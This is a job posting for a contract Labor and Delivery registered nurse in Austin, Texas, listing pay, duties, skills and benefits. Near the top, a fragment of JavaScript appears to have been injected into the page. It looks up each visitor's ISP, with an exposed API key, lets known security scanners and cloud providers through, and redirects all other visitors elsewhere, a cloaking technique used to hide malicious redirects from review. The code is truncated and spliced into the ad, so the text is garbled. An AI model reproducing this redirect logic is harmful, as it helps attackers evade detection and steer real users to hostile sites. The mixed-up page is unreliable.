Contract Labor and Delivery Registered Nurse
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a dedicated Local Contract Labor and Delivery Registered Nurse in Austin, Texas to provide exceptional care to mothers and newborns during the labor, delivery, and postpartum periods. This contract role offers competitive pay ranging from $53-$57 per hour.
Responsibilities include:
- Monitoring fetal heart rates and maternal vital signs
- Assisting with labor management and delivery procedures
- Providing postpartum care and patient education
- Collaborating with healthcare teams to ensure patient safety
- Documenting patient information accurately and timely
Skills needed:
- Current RN licensure in Texas
- Strong knowledge of labor and delivery protocols
- Excellent communication and critical thinking skills
- Ability to work efficiently in a fast-paced environment
Benefits include:
- Competitive hourly pay
- Flexible scheduling options
- Comprehensive RN benefits package
- Professional growth opportunities